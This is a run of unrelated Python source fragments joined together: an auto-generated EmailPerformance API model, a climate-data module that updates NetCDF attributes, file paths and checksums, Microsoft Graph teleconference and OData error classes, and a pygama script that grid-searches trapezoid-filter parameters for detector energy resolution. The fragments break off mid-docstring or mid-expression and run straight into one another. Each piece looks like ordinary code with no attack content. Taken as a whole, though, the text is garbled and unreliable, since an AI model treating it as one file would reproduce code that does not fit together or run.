""" return self._customer_histogram @customer_histogram.setter def customer_histogram(self, customer_histogram): """Sets the customer_histogram of this EmailPerformance. :param customer_histogram: The customer_histogram of this EmailPerformance. # noqa: E501 :type: EmailPerformanceCustomerHistogram """ self._customer_histogram = customer_histogram @property def daily_stats(self): """Gets the daily_stats of this EmailPerformance. # noqa: E501 Daily statistics used for charting # noqa: E501 :return: The daily_stats of this EmailPerformance. # noqa: E501 :rtype: list[EmailPerformanceDaily] """ return self._daily_stats @daily_stats.setter def daily_stats(self, daily_stats): """Sets the daily_stats of this EmailPerformance. Daily statistics used for charting # noqa: E501 :param daily_stats: The daily_stats of this EmailPerformance. # noqa: E501 :type: list[EmailPerformanceDaily] """ self._daily_stats = daily_stats @property def delivered_count(self): """Gets the delivered_count of this EmailPerformance. # noqa: E501 Delivered count # noqa: E501 :return: The delivered_count of this EmailPerformance. # noqa: E501 :rtype: int """ return self._delivered_count @delivered_count.setter def delivered_count(self, delivered_count): """Sets the delivered_count of this EmailPerformance. Delivered count # noqa: E501 :param delivered_count: The delivered_count of this EmailPerformance. # noqa: E501 :type: int """ self._delivered_count = delivered_count @property def max_active_customers(self): """Gets the max_active_customers of this EmailPerformance. # noqa: E501 Maximum active customers allowed under their billing plan # noqa: E501 :return: The max_active_customers of this EmailPerformance. # noqa: E501 :rtype: int """ return self._max_active_customers @max_active_customers.setter def max_active_customers(self, max_active_customers): """Sets the max_active_customers of this EmailPerformance. Maximum active customers allowed under their billing plan # noqa: E501 :param max_active_customers: The max_active_customers of this EmailPerformance. # noqa: E501 :type: int """ self._max_active_customers = max_active_customers @property def max_emails_per_day(self): """Gets the max_emails_per_day of this EmailPerformance. # noqa: E501 Max emails per day # noqa: E501 :return: The max_emails_per_day of this EmailPerformance. # noqa: E501 :rtype: int """ return self._max_emails_per_day @max_emails_per_day.setter def max_emails_per_day(self, max_emails_per_day): """Sets the max_emails_per_day of this EmailPerformance. Max emails per day # noqa: E501 :param max_emails_per_day: The max_emails_per_day of this EmailPerformance. # noqa: E501 :type: int """ self._max_emails_per_day = max_emails_per_day @property def max_emails_per_hour(self): """Gets the max_emails_per_hour of this EmailPerformance. # noqa: E501 Max emails per hour # noqa: E501 :return: The max_emails_per_hour of this EmailPerformance. # noqa: E501 :rtype: int """ return self._max_emails_per_hour @max_emails_per_hour.setter def max_emails_per_hour(self, max_emails_per_hour): """Sets the max_emails_per_hour of this EmailPerformance. Max emails per hour # noqa: E501 :param max_emails_per_hour: The
""" attribute_update.py - classes to update the values of files' attributes and keep the files, directory structure and DMT consistent. """ from abc import ABCMeta, abstractmethod import logging import os import re import shutil import six import tempfile from pdata_app.models import (Checksum, ClimateModel, DataRequest, Institute, Project, Settings, TapeChecksum) from pdata_app.utils.common import (adler32, construct_drs_path, construct_filename, get_gws, delete_drs_dir, is_same_gws, run_ncatted, run_ncrename) logger = logging.getLogger(__name__) # The top-level directory to write output data to BASE_OUTPUT_DIR = Settings.get_solo().base_output_dir class AttributeUpdateError(Exception): """ Base class for all custom exceptions """ pass class FileOfflineError(AttributeUpdateError): """ Raised when a file is marked as offline in the DMT """ def __init__(self, directory, filename): message = '{} is offline'.format(os.path.join(directory, filename)) Exception.__init__(self, message) class FileNotOnDiskError(AttributeUpdateError): """ Raised when a file is not found on disk """ def __init__(self, directory, filename): message = '{} was not found on disk'.format(os.path.join(directory, filename)) Exception.__init__(self, message) class SymLinkIsFileError(AttributeUpdateError): """ Raised when a file is found when a symbolic link was expected. """ def __init__(self, filepath): message = ("{} was expected to be a symbolic link but isn't.". format(filepath)) Exception.__init__(self, message) @six.add_metaclass(ABCMeta) class DmtUpdate(object): """ Abstract base class for any updates to files in the DMT. """ def __init__(self, datafile, new_value, update_file_only=False): """ Initialise the class :param pdata_apps.models.DataFile datafile: the file to update :param str new_value: the new value to apply :param bool update_file_only: if true then update just the file and don't make any changes to the database. """ self.datafile = datafile self.new_value = new_value self.old_filename = self.datafile.name self.old_directory = self.datafile.directory self.old_sym_link_dir = os.path.join(BASE_OUTPUT_DIR, construct_drs_path(self.datafile)) self.new_filename = None self.new_directory = None self.update_file_only = update_file_only @abstractmethod def update(self): """ Update everything. """ pass def _check_available(self): """ Check that the file is online in the DMT and can be found in its specified location on disk. :raises FileOfflineError: if file does not have a status of online in the DMT. :raises FileNotOnDiskError: if the file is not found on disk. """ if not self.datafile.online: raise FileOfflineError(self.old_directory, self.old_filename) if not os.path.exists(os.path.join(self.old_directory, self.old_filename)): raise FileNotOnDiskError(self.old_directory, self.old_filename) @abstractmethod def _update_file_attribute(self): """ Update the metadata attribute in the file. Assume the file has its original path and name. """ pass def _construct_filename(self): """ Construct the new filename. """ self.new_filename = construct_filename(self.datafile) def _update_filename_in_db(self): """ Update the file's name in the database. """ self.datafile.name = self.new_filename self.datafile.save() def _update_checksum(self): """ Update the checksum and size of the file in the database, preserving the original values. Assume the file has its new path and name. """ # Archive the checksum and calculate its new value cs = self.datafile.checksum_set.first() if not cs: logger.warning('No checksum for {}'.format(self.datafile.name)) else: if self.datafile.tapechecksum_set.count() == 0: TapeChecksum.objects.create( data_file=self.datafile, checksum_value=cs.checksum_value, checksum_type=cs.checksum_type ) # Remove the original checksum now that the tape checksum's # been created cs.delete() new_path = os.path.join(self.new_directory, self.new_filename) Checksum.objects.create( data_file=self.datafile, checksum_type='ADLER32', checksum_value=adler32(new_path) ) # Update the file's size if self.datafile.tape_size is None: self.datafile.tape_size = self.datafile.size self.datafile.size = os.path.getsize(new_path) self.datafile.save() def _construct_directory(self): """ Construct the new directory path. """ self.new_directory = os.path.join(get_gws(self.datafile.directory), construct_drs_path(self.datafile)) def _update_directory_in_db(self): """ Update the file's directory. """ self.datafile.directory = self.new_directory self.datafile.save() def _rename_file(self): """ Rename the file on disk and move to its new directory. Update the link from the primary directory. """ if not os.path.exists(self.new_directory): os.makedirs(self.new_directory) os.rename(os.path.join(self.old_directory, self.old_filename), os.path.join(self.new_directory, self.new_filename)) # check for empty directory if not os.listdir(self.old_directory): delete_drs_dir(self.old_directory) # Update the symbolic link if required if not is_same_gws(self.old_directory, BASE_OUTPUT_DIR): old_link_path = os.path.join(self.old_sym_link_dir, self.old_filename) if os.path.lexists(old_link_path): if not os.path.islink(old_link_path): logger.error("{} exists and isn't a symbolic link.". format(old_link_path)) raise SymLinkIsFileError(old_link_path) else: # it is a link so remove it os.remove(old_link_path) # check for empty directory if not os.listdir(self.old_sym_link_dir): delete_drs_dir(self.old_sym_link_dir) new_link_dir = os.path.join(BASE_OUTPUT_DIR, construct_drs_path(self.datafile)) if not os.path.exists(new_link_dir): os.makedirs(new_link_dir) os.symlink(os.path.join(self.new_directory, self.new_filename), os.path.join(new_link_dir, self.new_filename)) @six.add_metaclass(ABCMeta) class DataRequestUpdate(DmtUpdate): """ Abstract base class for updates that require a move of the files to a different DataRequest object. """ def __init__(self, datafile, new_value, update_file_only=False): """ Initialise the class :param pdata_apps.models.DataFile datafile: the file to update :param str new_value: the new value to apply :param bool update_file_only: if true then update just the file and don't make any changes to the database. """ super(DataRequestUpdate, self).__init__(datafile, new_value, update_file_only) # The name and value of the data_request attribute being modified self.data_req_attribute_name = None self.data_req_attribute_value = None # The destination data_request self.new_dreq = None def update(self): """ Update everything. """ if not self.update_file_only: # Default mode of operation. Update the data request and # everything. self._find_new_dreq() self._check_available() self._update_database_attribute() self._update_file_attribute() self._construct_filename() self._update_filename_in_db() self._construct_directory() self._update_directory_in_db() self._rename_file() self._update_checksum() self._move_dreq() else: # For when this has been run before and we just need to update # files that have pulled from disk again. self.old_filename = self.datafile.incoming_name self._check_available() self._update_file_attribute() self._construct_filename() self._construct_directory() self._rename_file() self._update_checksum() def _find_new_dreq(self): """ Find the new data request. If it can't be find the data request (or there are multiple ones) then Django will raise an exception so that we don't make any changes to the files or DB. """ if self.data_req_attribute_name is None: raise NotImplementedError("data_req_attribute_name hasn't been " "set.") if self.data_req_attribute_value is None: raise NotImplementedError("data_req_attribute_value hasn't been " "set.") # the default values from the existing data request dreq_dict = { 'project': self.datafile.data_request.project, 'institute': self.datafile.data_request.institute, 'climate_model': self.datafile.data_request.climate_model, 'experiment': self.datafile.data_request.experiment, 'variable_request': self.datafile.data_request.variable_request, 'rip_code': self.datafile.data_request.rip_code } # overwrite with the new value dreq_dict[self.data_req_attribute_name] = self.data_req_attribute_value # find the data request self.new_dreq = DataRequest.objects.get(**dreq_dict) @abstractmethod def _update_database_attribute(self): """ Update the attribute in the database. """ pass def _move_dreq(self): """ Move the data file to the new data request """ self.datafile.data_request = self.new_dreq self.datafile.save() class SourceIdUpdate(DataRequestUpdate): """ Update a DataFile's source_id (climate model). """ def __init__(self, datafile, new_value, update_file_only=False): """ Initialise the class """ super(SourceIdUpdate, self).__init__(datafile, new_value, update_file_only) self.data_req_attribute_name = 'climate_model' self.data_req_attribute_value = ClimateModel.objects.get( short_name=self.new_value ) def _update_database_attribute(self): """ Update the source_id """ new_source_id = ClimateModel.objects.get(short_name=self.new_value) self.datafile.climate_model = new_source_id self.datafile.save() def _update_file_attribute(self): """ Update the source_id and make the same change in the further_info_url. Assume the file has its original path and name. """ # source_id run_ncatted(self.old_directory, self.old_filename, 'source_id', 'global', 'c', self.new_value, False) # further_info_url further_info_url = ('https://furtherinfo.es-doc.org/{}.{}.{}.{}.none.' '{}'.format(self.datafile.project.short_name, self.datafile.institute.short_name, self.new_value, self.datafile.experiment.short_name, self.datafile.rip_code)) run_ncatted(self.old_directory, self.old_filename, 'further_info_url', 'global', 'c', further_info_url, False) class MipEraUpdate(DataRequestUpdate): """ Update a DataFile's mip_era (project in the DMT). """ def __init__(self, datafile, new_value, update_file_only=False, temp_dir=None): """ Initialise the class """ super(MipEraUpdate, self).__init__(datafile, new_value, update_file_only) self.data_req_attribute_name = 'project' self.data_req_attribute_value = Project.objects.get( short_name=self.new_value ) self.temp_dir = temp_dir def _update_database_attribute(self): """ Update the source_id """ new_mip_era = Project.objects.get(short_name=self.new_value) self.datafile.project = new_mip_era self.datafile.save() def _update_file_attribute(self): """ Update the source_id and make the same change in the further_info_url. Assume the file has its original path and name. """ if self.temp_dir: orig_path = os.path.join(self.old_directory, self.old_filename) temp_dir = tempfile.mkdtemp(dir=self.temp_dir) temp_path = os.path.join(temp_dir, self.old_filename) shutil.copyfile(orig_path, temp_path) working_dir = temp_dir else: working_dir = self.old_directory # source_id run_ncatted(working_dir, self.old_filename, 'mip_era', 'global', 'c', self.new_value, False) # further_info_url further_info_url = ('https://furtherinfo.es-doc.org/{}.{}.{}.{}.none.' '{}'.format(self.new_value, self.datafile.institute.short_name, self.datafile.climate_model.short_name, self.datafile.experiment.short_name, self.datafile.rip_code)) run_ncatted(working_dir, self.old_filename, 'further_info_url', 'global', 'c', further_info_url, False) if self.temp_dir: os.rename(orig_path, orig_path + '.old') shutil.copyfile(temp_path, orig_path) os.remove(orig_path + '.old') os.remove(temp_path) os.rmdir(temp_dir) class InstitutionIdUpdate(DataRequestUpdate): """ Update a DataFile's institution_id. """ def __init__(self, datafile, new_value, update_file_only=False, temp_dir=None): """ Initialise the class """ super(InstitutionIdUpdate, self).__init__(datafile, new_value, update_file_only) self.data_req_attribute_name = 'institute' self.data_req_attribute_value = Institute.objects.get( short_name=self.new_value ) self.temp_dir = temp_dir def _update_database_attribute(self): """ Update the institution_id. """ new_institute = Institute.objects.get(short_name=self.new_value) self.datafile.institute = new_institute self.datafile.save() def _update_file_attribute(self): """ Update the institution_id and make the same change in further_info_url, institution and license. Assume the file has its original path and name. """ if self.temp_dir: orig_path = os.path.join(self.old_directory, self.old_filename) temp_dir = tempfile.mkdtemp(dir=self.temp_dir) temp_path = os.path.join(temp_dir, self.old_filename) shutil.copyfile(orig_path, temp_path) working_dir = temp_dir else: working_dir = self.old_directory # institution_id run_ncatted(working_dir, self.old_filename, 'institution_id', 'global', 'c', self.new_value, False) # institution new_insts = { 'MOHC': 'Met Office Hadley Centre, Fitzroy Road, Exeter, Devon, ' 'EX1 3PB, UK', 'NERC': 'Natural Environment Research Council, STFC-RAL, Harwell, ' 'Oxford, OX11 0QX, UK' } inst = new_insts[self.new_value] run_ncatted(working_dir, self.old_filename, 'institution', 'global', 'c', inst) # further_info_url further_info_url = ( 'https://furtherinfo.es-doc.org/{}.{}.{}.{}.none.{}'. format(self.datafile.project.short_name, self.new_value, self.datafile.climate_model.short_name, self.datafile.experiment.short_name, self.datafile.rip_code)) run_ncatted(working_dir, self.old_filename, 'further_info_url', 'global', 'c', further_info_url) # license license_txt = ( f'CMIP6 model data produced by {self.new_value} is licensed under ' f'a Creative Commons Attribution-ShareAlike 4.0 International ' f'License (https://creativecommons.org/licenses). Consult ' f'https://pcmdi.llnl.gov/CMIP6/TermsOfUse for
delay. :type maximum_inbound_round_trip_delay: ~datetime.timedelta :param maximum_outbound_jitter: The maximum outbound stream network jitter. :type maximum_outbound_jitter: ~datetime.timedelta :param maximum_outbound_packet_loss_rate_in_percentage: The maximum outbound stream packet loss rate in percentage (0-100). For example, 0.01 means 0.01%. :type maximum_outbound_packet_loss_rate_in_percentage: float :param maximum_outbound_round_trip_delay: The maximum outbound stream network round trip delay. :type maximum_outbound_round_trip_delay: ~datetime.timedelta :param media_duration: The total modality duration. If the media enabled and disabled multiple times, MediaDuration will the summation of all of the durations. :type media_duration: ~datetime.timedelta :param network_link_speed_in_bytes: The network link speed in bytes. :type network_link_speed_in_bytes: long :param outbound_packets: The total number of the outbound packets. :type outbound_packets: long :param remote_ip_address: The remote IP address for the media session. :type remote_ip_address: str :param remote_port: The remote media port. :type remote_port: int """ _validation = { 'channel_index': {'maximum': 2147483647, 'minimum': -2147483648}, 'local_port': {'maximum': 2147483647, 'minimum': -2147483648}, 'remote_port': {'maximum': 2147483647, 'minimum': -2147483648}, } _attribute_map = { 'additional_properties': {'key': '', 'type': '{object}'}, 'average_inbound_jitter': {'key': 'averageInboundJitter', 'type': 'duration'}, 'average_inbound_packet_loss_rate_in_percentage': {'key': 'averageInboundPacketLossRateInPercentage', 'type': 'float'}, 'average_inbound_round_trip_delay': {'key': 'averageInboundRoundTripDelay', 'type': 'duration'}, 'average_outbound_jitter': {'key': 'averageOutboundJitter', 'type': 'duration'}, 'average_outbound_packet_loss_rate_in_percentage': {'key': 'averageOutboundPacketLossRateInPercentage', 'type': 'float'}, 'average_outbound_round_trip_delay': {'key': 'averageOutboundRoundTripDelay', 'type': 'duration'}, 'channel_index': {'key': 'channelIndex', 'type': 'int'}, 'inbound_packets': {'key': 'inboundPackets', 'type': 'long'}, 'local_ip_address': {'key': 'localIPAddress', 'type': 'str'}, 'local_port': {'key': 'localPort', 'type': 'int'}, 'maximum_inbound_jitter': {'key': 'maximumInboundJitter', 'type': 'duration'}, 'maximum_inbound_packet_loss_rate_in_percentage': {'key': 'maximumInboundPacketLossRateInPercentage', 'type': 'float'}, 'maximum_inbound_round_trip_delay': {'key': 'maximumInboundRoundTripDelay', 'type': 'duration'}, 'maximum_outbound_jitter': {'key': 'maximumOutboundJitter', 'type': 'duration'}, 'maximum_outbound_packet_loss_rate_in_percentage': {'key': 'maximumOutboundPacketLossRateInPercentage', 'type': 'float'}, 'maximum_outbound_round_trip_delay': {'key': 'maximumOutboundRoundTripDelay', 'type': 'duration'}, 'media_duration': {'key': 'mediaDuration', 'type': 'duration'}, 'network_link_speed_in_bytes': {'key': 'networkLinkSpeedInBytes', 'type': 'long'}, 'outbound_packets': {'key': 'outboundPackets', 'type': 'long'}, 'remote_ip_address': {'key': 'remoteIPAddress', 'type': 'str'}, 'remote_port': {'key': 'remotePort', 'type': 'int'}, } def __init__( self, **kwargs ): super(MicrosoftGraphTeleconferenceDeviceMediaQuality, self).__init__(**kwargs) self.additional_properties = kwargs.get('additional_properties', None) self.average_inbound_jitter = kwargs.get('average_inbound_jitter', None) self.average_inbound_packet_loss_rate_in_percentage = kwargs.get('average_inbound_packet_loss_rate_in_percentage', None) self.average_inbound_round_trip_delay = kwargs.get('average_inbound_round_trip_delay', None) self.average_outbound_jitter = kwargs.get('average_outbound_jitter', None) self.average_outbound_packet_loss_rate_in_percentage = kwargs.get('average_outbound_packet_loss_rate_in_percentage', None) self.average_outbound_round_trip_delay = kwargs.get('average_outbound_round_trip_delay', None) self.channel_index = kwargs.get('channel_index', None) self.inbound_packets = kwargs.get('inbound_packets', None) self.local_ip_address = kwargs.get('local_ip_address', None) self.local_port = kwargs.get('local_port', None) self.maximum_inbound_jitter = kwargs.get('maximum_inbound_jitter', None) self.maximum_inbound_packet_loss_rate_in_percentage = kwargs.get('maximum_inbound_packet_loss_rate_in_percentage', None) self.maximum_inbound_round_trip_delay = kwargs.get('maximum_inbound_round_trip_delay', None) self.maximum_outbound_jitter = kwargs.get('maximum_outbound_jitter', None) self.maximum_outbound_packet_loss_rate_in_percentage = kwargs.get('maximum_outbound_packet_loss_rate_in_percentage', None) self.maximum_outbound_round_trip_delay = kwargs.get('maximum_outbound_round_trip_delay', None) self.media_duration = kwargs.get('media_duration', None) self.network_link_speed_in_bytes = kwargs.get('network_link_speed_in_bytes', None) self.outbound_packets = kwargs.get('outbound_packets', None) self.remote_ip_address = kwargs.get('remote_ip_address', None) self.remote_port = kwargs.get('remote_port', None) class MicrosoftGraphTeleconferenceDeviceQuality(msrest.serialization.Model): """teleconferenceDeviceQuality. :param additional_properties: Unmatched properties from the message are deserialized to this collection. :type additional_properties: dict[str, object] :param call_chain_id: A unique identifier for all the participant calls in a conference or a unique identifier for two participant calls in P2P call. This needs to be copied over from Microsoft.Graph.Call.CallChainId. :type call_chain_id: str :param cloud_service_deployment_environment: A geo-region where the service is deployed, such as ProdNoam. :type cloud_service_deployment_environment: str :param cloud_service_deployment_id: A unique deployment identifier assigned by Azure. :type cloud_service_deployment_id: str :param cloud_service_instance_name: The Azure deployed cloud service instance name, such as FrontEnd_IN_3. :type cloud_service_instance_name: str :param cloud_service_name: The Azure deployed cloud service name, such as contoso.cloudapp.net. :type cloud_service_name: str :param device_description: Any additional description, such as VTC Bldg 30/21. :type device_description: str :param device_name: The user media agent name, such as Cisco SX80. :type device_name: str :param media_leg_id: A unique identifier for a specific media leg of a participant in a conference. One participant can have multiple media leg identifiers if retargeting happens. CVI partner assigns this value. :type media_leg_id: str :param media_quality_list: The list of media qualities in a media session (call), such as audio quality, video quality, and/or screen sharing quality. :type media_quality_list: list[~cloud_communications.models.MicrosoftGraphTeleconferenceDeviceMediaQuality] :param participant_id: A unique identifier for a specific participant in a conference. The CVI partner needs to copy over Call.MyParticipantId to this property. :type participant_id: str """ _attribute_map = { 'additional_properties': {'key': '', 'type': '{object}'}, 'call_chain_id': {'key': 'callChainId', 'type': 'str'}, 'cloud_service_deployment_environment': {'key': 'cloudServiceDeploymentEnvironment', 'type': 'str'}, 'cloud_service_deployment_id': {'key': 'cloudServiceDeploymentId', 'type': 'str'}, 'cloud_service_instance_name': {'key': 'cloudServiceInstanceName', 'type': 'str'}, 'cloud_service_name': {'key': 'cloudServiceName', 'type': 'str'}, 'device_description': {'key': 'deviceDescription', 'type': 'str'}, 'device_name': {'key': 'deviceName', 'type': 'str'}, 'media_leg_id': {'key': 'mediaLegId', 'type': 'str'}, 'media_quality_list': {'key': 'mediaQualityList', 'type': '[MicrosoftGraphTeleconferenceDeviceMediaQuality]'}, 'participant_id': {'key': 'participantId', 'type': 'str'}, } def __init__( self, **kwargs ): super(MicrosoftGraphTeleconferenceDeviceQuality, self).__init__(**kwargs) self.additional_properties = kwargs.get('additional_properties', None) self.call_chain_id = kwargs.get('call_chain_id', None) self.cloud_service_deployment_environment = kwargs.get('cloud_service_deployment_environment', None) self.cloud_service_deployment_id = kwargs.get('cloud_service_deployment_id', None) self.cloud_service_instance_name = kwargs.get('cloud_service_instance_name', None) self.cloud_service_name = kwargs.get('cloud_service_name', None) self.device_description = kwargs.get('device_description', None) self.device_name = kwargs.get('device_name', None) self.media_leg_id = kwargs.get('media_leg_id', None) self.media_quality_list = kwargs.get('media_quality_list', None) self.participant_id = kwargs.get('participant_id', None) class MicrosoftGraphToneInfo(msrest.serialization.Model): """toneInfo. :param additional_properties: Unmatched properties from the message are deserialized to this collection. :type additional_properties: dict[str, object] :param sequence_id: An incremental identifier used for ordering DTMF events. :type sequence_id: long :param tone: Possible values include: "tone0", "tone1", "tone2", "tone3", "tone4", "tone5", "tone6", "tone7", "tone8", "tone9", "star", "pound", "a", "b", "c", "d", "flash". :type tone: str or ~cloud_communications.models.MicrosoftGraphTone """ _attribute_map = { 'additional_properties': {'key': '', 'type': '{object}'}, 'sequence_id': {'key': 'sequenceId', 'type': 'long'}, 'tone': {'key': 'tone', 'type': 'str'}, } def __init__( self, **kwargs ): super(MicrosoftGraphToneInfo, self).__init__(**kwargs) self.additional_properties = kwargs.get('additional_properties', None) self.sequence_id = kwargs.get('sequence_id', None) self.tone = kwargs.get('tone', None) class MicrosoftGraphUnmuteParticipantOperation(MicrosoftGraphCommsOperation): """unmuteParticipantOperation. :param id: Read-only. :type id: str :param client_context: Unique Client Context string. Max limit is 256 chars. :type client_context: str :param result_info: ResultInfo. :type result_info: ~cloud_communications.models.MicrosoftGraphResultInfo :param status: Possible values include: "NotStarted", "Running", "Completed", "Failed". :type status: str or ~cloud_communications.models.MicrosoftGraphOperationStatus :param additional_properties: Unmatched properties from the message are deserialized to this collection. :type additional_properties: dict[str, object] """ _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'client_context': {'key': 'clientContext', 'type': 'str'}, 'result_info': {'key': 'resultInfo', 'type': 'MicrosoftGraphResultInfo'}, 'status': {'key': 'status', 'type': 'str'}, 'additional_properties': {'key': '', 'type': '{object}'}, } def __init__( self, **kwargs ): super(MicrosoftGraphUnmuteParticipantOperation, self).__init__(**kwargs) self.additional_properties = kwargs.get('additional_properties', None) class MicrosoftGraphUpdateRecordingStatusOperation(MicrosoftGraphCommsOperation): """updateRecordingStatusOperation. :param id: Read-only. :type id: str :param client_context: Unique Client Context string. Max limit is 256 chars. :type client_context: str :param result_info: ResultInfo. :type result_info: ~cloud_communications.models.MicrosoftGraphResultInfo :param status: Possible values include: "NotStarted", "Running", "Completed", "Failed". :type status: str or ~cloud_communications.models.MicrosoftGraphOperationStatus :param additional_properties: Unmatched properties from the message are deserialized to this collection. :type additional_properties: dict[str, object] """ _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'client_context': {'key': 'clientContext', 'type': 'str'}, 'result_info': {'key': 'resultInfo', 'type': 'MicrosoftGraphResultInfo'}, 'status': {'key': 'status', 'type': 'str'}, 'additional_properties': {'key': '', 'type': '{object}'}, } def __init__( self, **kwargs ): super(MicrosoftGraphUpdateRecordingStatusOperation, self).__init__(**kwargs) self.additional_properties = kwargs.get('additional_properties', None) class OdataError(msrest.serialization.Model): """OdataError. All required parameters must be populated in order to send to Azure. :param additional_properties: Unmatched properties from the message are deserialized to this collection. :type additional_properties: dict[str, object] :param error: Required. :type error: ~cloud_communications.models.OdataErrorMain """ _validation = { 'error': {'required': True}, } _attribute_map = { 'additional_properties': {'key': '', 'type': '{object}'}, 'error': {'key': 'error', 'type': 'OdataErrorMain'}, } def __init__( self, **kwargs ): super(OdataError, self).__init__(**kwargs) self.additional_properties = kwargs.get('additional_properties', None) self.error = kwargs['error'] class OdataErrorDetail(msrest.serialization.Model): """OdataErrorDetail. All required parameters must be populated in order to send to Azure. :param additional_properties: Unmatched properties from the message are deserialized to this collection. :type additional_properties: dict[str, object] :param code: Required. :type code: str :param message: Required. :type message: str :param target: :type target: str """ _validation = { 'code': {'required': True}, 'message': {'required': True}, } _attribute_map = { 'additional_properties': {'key': '', 'type': '{object}'}, 'code': {'key': 'code', 'type': 'str'}, 'message': {'key': 'message', 'type': 'str'}, 'target': {'key': 'target', 'type': 'str'}, } def __init__( self, **kwargs ): super(OdataErrorDetail, self).__init__(**kwargs) self.additional_properties = kwargs.get('additional_properties', None) self.code = kwargs['code'] self.message = kwargs['message'] self.target = kwargs.get('target', None) class OdataErrorMain(msrest.serialization.Model): """OdataErrorMain. All required parameters must be populated in order to send to Azure. :param additional_properties: Unmatched properties from the message are deserialized to this collection. :type additional_properties: dict[str, object] :param code: Required. :type code: str :param message: Required. :type message: str :param target: :type target: str :param details: :type details: list[~cloud_communications.models.OdataErrorDetail] :param innererror: The structure of this object is service-specific. :type innererror: dict[str, object] """ _validation = { 'code': {'required': True}, 'message': {'required': True}, } _attribute_map = { 'additional_properties': {'key': '', 'type': '{object}'}, 'code': {'key': 'code', 'type': 'str'}, 'message': {'key': 'message', 'type': 'str'}, 'target': {'key': 'target', 'type': 'str'}, 'details': {'key': 'details', 'type': '[OdataErrorDetail]'}, 'innererror': {'key': 'innererror', 'type': '{object}'}, } def __init__( self, **kwargs ): super(OdataErrorMain, self).__init__(**kwargs) self.additional_properties = kwargs.get('additional_properties', None) self.code = kwargs['code'] self.message = kwargs['message'] self.target =
#!/usr/bin/env python3 import os import argparse import time import pandas as pd import numpy as np import matplotlib.pyplot as plt plt.style.use('clint.mpl') from pprint import pprint import scipy.signal as signal import itertools from pygama import DataSet import pygama.utils as pu import pygama.analysis.histograms as ph import pygama.analysis.peak_fitting as pf def main(): """ to get the best energy resolution, we want to explore the possible values of our DSP processor list, especially trap filter and RC decay constants. a flexible + easy way to vary a bunch of parameters at once is to create a DataFrame with each row corresponding to a set of parameters. We then use this DF as an input/output for the other functions. it could also easily be extended to loop over individual detectors, or vary any other set of parameters in the processor list ...... """ par = argparse.ArgumentParser(description="pygama dsp optimizer") arg, st, sf = par.add_argument, "store_true", "store_false" arg("-ds", nargs='*', action="store", help="load runs for a DS") arg("-r", "--run", nargs=1, help="load a single run") arg("-g", "--grid", action=st, help="set DSP parameters to be varied") arg("-w", "--window", action=st, help="generate a small waveform file") arg("-p", "--process", action=st, help="run DSP processing") arg("-f", "--fit", action=st, help="fit outputs to peakshape function") arg("-t", "--plot", action=st, help="find optimal parameters & make plots") arg("-v", "--verbose", action=st, help="set verbose mode") args = vars(par.parse_args()) ds = pu.get_dataset_from_cmdline(args, "runDB.json", "calDB.json") # pprint(ds.paths) # set I/O locations d_out = os.path.expanduser('~') + "/Data/cage" f_grid = f"{d_out}/cage_optimizer_grid.h5" f_tier1 = f"{d_out}/cage_optimizer_t1.h5" f_tier2 = f"{d_out}/cage_optimizer_t2.h5" f_opt = f"{d_out}/cage_optimizer_data.h5" # -- run routines -- if args["grid"]: # set the combination of processor params to vary to optimize resolution set_grid(f_grid) if args["window"]: # generate a small single-peak file w/ uncalibrated energy to reanalyze window_ds(ds, f_tier1) if args["process"]: # create a file with DataFrames for each set of parameters process_ds(ds, f_grid, f_opt, f_tier1, f_tier2) if args["fit"]: # fit all outputs to the peakshape function and find the best resolution get_fwhm(f_grid, f_opt, verbose=args["verbose"]) if args["plot"]: # show results plot_fwhm(f_grid) def set_grid(f_grid): """ """ # # this is pretty ambitious, but maybe doable -- 3500 entries # e_rises = np.arange(1, 6, 0.2) # e_flats = np.arange(0.5, 4, 0.5) # rc_consts = np.arange(50, 150, 5) # ~same as MJD charge trapping correction # this runs more quickly -- 100 entries, 3 minutes on my mac e_rises = np.arange(2, 3, 0.2) e_flats = np.arange(1, 3, 1) rc_consts = np.arange(52, 152, 10) # TODO: jason's suggestions, knowing the expected shape of the noise curve # e_rises = np.linspace(-1, 0, sqrt(sqrt(3)) # jason says try this # e_rises # make another list which is 10^pwr of this list # np.linspace(log_tau_min, log_tau_max) # jason says try this too lists = [e_rises, e_flats, rc_consts] prod = list(itertools.product(*lists)) # clint <3 stackoverflow df = pd.DataFrame(prod, columns=['rise','flat','rc']) # print(df) df.to_hdf(f_grid, key="pygama_optimization") print("Wrote master grid file:", f_grid) def window_ds(ds, f_tier1): """ Take a single DataSet and window it so that the output file only contains events near an expected peak location. """ # a user has to figure out the uncalibrated energy range of the K40 peak # xlo, xhi, xpb = 0, 2e6, 2000 # show phys. spectrum (top feature is 2615 pk) xlo, xhi, xpb = 990000, 1030000, 250 # k40 peak, ds 3 t2df = ds.get_t2df() hE, xE = ph.get_hist(t2df["energy"], range=(xlo, xhi), dx=xpb) plt.semilogy(xE, hE, ls='steps', lw=1, c='r') import matplotlib.ticker as ticker plt.gca().xaxis.set_major_formatter(ticker.FormatStrFormatter('%0.4e')) plt.locator_params(axis='x', nbins=5) plt.xlabel("Energy (uncal.)", ha='right', x=1) plt.ylabel("Counts", ha='right', y=1) plt.savefig(f"./plots/cage_ds{ds.ds_lo}_winK40.pdf") # exit() # write a windowed tier 1 file containing only waveforms near the peak t1df = pd.DataFrame() for run in ds.paths: ft1 = ds.paths[run]["t1_path"] print(f"Scanning ds {ds.ds_lo}, run {run}\n file: {ft1}") for chunk in pd.read_hdf(ft1, 'ORSIS3302DecoderForEnergy', chunksize=5e4): t1df_win = chunk.loc[(chunk.energy > xlo) & (chunk.energy < xhi)] print(t1df_win.shape) t1df = pd.concat([t1df, t1df_win], ignore_index=True) # -- save to HDF5 output file -- h5_opts = { "mode":"w", # overwrite existing "append":False, "format":"table", # "complib":"blosc:zlib", # no compression, increases I/O speed # "complevel":1, # "data_columns":["ievt"] } t1df.reset_index(inplace=True) t1df.to_hdf(f_tier1, key="df_windowed", **h5_opts) print("wrote file:", f_tier1) def process_ds(ds, f_grid, f_opt, f_tier1, f_tier2): """ and determine the trapezoid parameters that minimize the FWHM of the peak (fitting to the peakshape function). NOTE: I don't think we need to multiprocess this, since that's already being done in ProcessTier1 """ from pygama.dsp.base import Intercom from pygama.io.tier1 import ProcessTier1 import pygama.io.decoders.digitizers as pgd df_grid = pd.read_hdf(f_grid) if os.path.exists(f_opt): os.remove(f_opt) # check the windowed file # tmp = pd.read_hdf(f_tier1) # nevt = len(tmp) t_start = time.time() for i, row in df_grid.iterrows(): # estimate remaining 